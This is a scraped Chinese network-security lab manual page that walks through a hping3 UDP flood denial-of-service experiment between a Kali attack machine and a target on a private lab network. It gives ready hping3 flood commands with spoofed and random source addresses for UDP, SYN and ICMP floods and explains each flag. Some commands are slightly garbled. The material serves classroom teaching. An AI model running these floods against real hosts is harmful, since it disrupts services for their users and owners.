- 1、本文档共8页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
拒绝服务攻击实例--
Hping3udpflood攻击实验分析
基础知识介绍
UDPFlooding攻击也是基于传输层的UDP协议来实现的,但与TCP协议不同的是,UDP协
议是面向无连接的,即客户端和服务端之间直接进行通信,无需建立连接。因此恶意攻击者
利用UDP协议面向无连接的特点,发送大量恶意的UDP数据包攻击目标网络带宽,造成网
络拥堵,并且基于UDP协议的应用层协议的种类也非常多,对于UDPFlooding攻击的防御
也相对比较困难。
实验环境准备
准备两台linux系统,其中一台kali作为攻击机,另一台安装wireshark作为靶机,靶机IP
地址192.168.188.130,攻击机IP地址为192.168.188.128,可ping通
实验:
1、我们首先登陆到kali系统中,用户名为admin123,密码为root。
2、我们接下来在攻击机kali桌面的左上角找到终端图标,打开kali终端,并输入查询ip的
命令“ifconfig”。
可知我们进行实验的攻击机ip为192.168.188.128.
随后我们打开靶机kali的系统,同上步操作一样,查询靶机ip。
我们得知靶机ip为192.168.188.130.
我们得到基础的ip信息后,接下来在靶机上打开wireshark程序,进行流量监控。打开
方式如下图。
3、随后选择eth0进入wireshark。
4、随后在攻击机打开终端,输入以下命令
(sudo)hping3-q-n-a1.11.2.1--udp-s10086-p10085--flood192.168.188.130-d
1000
Sudo:如果后面命令执行时没有root权限,则在前面加上sudo
Hping3:为该实验工具启示命令
-q:静默模式
-n:数值化的输出
-a:伪造源ip
--udp:udp
-s:源端口
-p:目标端口
--flood:攻击类型为flood攻击
192.168.188.130:靶机ip
-d:包大小
执行上述命令后,攻击机就开始向靶机进行udpflood攻击了
^+C结束
5、随后在靶机wireshark上面进行流量观察。
发现收到了大量1.11.2.1打过来的udp的包,故证明实验成功。
命令:
hping3-q-n-a伪造源IP地址-S-s伪造源端口号--keep-p被攻击机目标端口号--
flood被攻击机IP地址
随机源地址
hping3-q-n--rand-source--udp-s10086-p10085--flood10.1.1.30-d100
hping3-q-n-a10.2.2.3--udp-s10086-p10085--flood10.1.1.30-d100
hping3-q-n--rand-source--id0--icmp--flood10.1.1.30-d56
--rand-source表示伪造随机的源地址;--id0表示有ICMP应答请求(就是我们平时
执行ping命令时的数据包);-d56表示数据包的大小(56是执行ping命令时数据包的
大小);--flood表示尽可能快地发送数据包。
ping3-q-n--rand-source–S-s10086-p10085--flood10.1.1.30-d100
ping3-q-n--rand-source-s10086-p10085--flood10.1.1.30-d100
您可能关注的文档
- 计算机网络安全技术(石淑华 第7版)(微课版)-教案全套 1. 网络安全概述--8.Windows安全.docx
- 计算机网络安全技术(第7版)(微课版) 实验手册---ARP欺骗实例-Kali.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Kali的基本配置.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Kali的基本应用.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Kali虚拟机的安装.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Matesploit的基本使用(1).pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Matesploit的基本使用(2).pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Nessus扫描器的使用.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Nmap扫描器的使用.pdf
- 计算机网络安全技术(第7版)(微课版) 实验手册---Windows防火墙IPsec配置的.pdf
- 中国国家标准 GB/T 4214.17-2024家用和类似用途电器噪声测试方法 干式清洁机器人的特殊要求.pdf
- GB/T 4214.17-2024家用和类似用途电器噪声测试方法 干式清洁机器人的特殊要求.pdf
- 《GB/Z 43202.1-2024机器人 GB/T 36530的应用 第1部分:安全相关试验方法》.pdf
- GB/Z 43202.1-2024机器人 GB/T 36530的应用 第1部分:安全相关试验方法.pdf
- 中国国家标准 GB/Z 43202.1-2024机器人 GB/T 36530的应用 第1部分:安全相关试验方法.pdf
- 中国国家标准 GB/T 32455-2024航天术语 运输系统.pdf
- GB/T 32455-2024航天术语 运输系统.pdf
- 《GB/T 32455-2024航天术语 运输系统》.pdf
- GB/T 44369-2024用于技术设计的人体运动生物力学测量基础项目.pdf
- 中国国家标准 GB/T 44369-2024用于技术设计的人体运动生物力学测量基础项目.pdf
最近下载
- 溶胶—凝胶先驱体法制备纳米碳化物材料研究-study on preparation of nano-carbide materials by sol-gel precursor method.docx
- 浅谈蒙古族舞蹈的审美特征 以舞蹈作品国家的孩子为例.docx
- 华为5G4期设备详细产品介绍.xlsx
- 精选山东省济南市2024年中考化学真题试题(含解析).(数理化网).doc
- 2024年上海高考化学试卷及答案解析版.doc
- 浅谈舞蹈国家的孩子的艺术审美特征.docx
- OWC11控件的安装.doc
- 本科教学工作合格评估指标体系内涵解读.ppt
- 涂装集中输调漆系统.docx
- 集中输调漆系统.pdf
文档评论(0)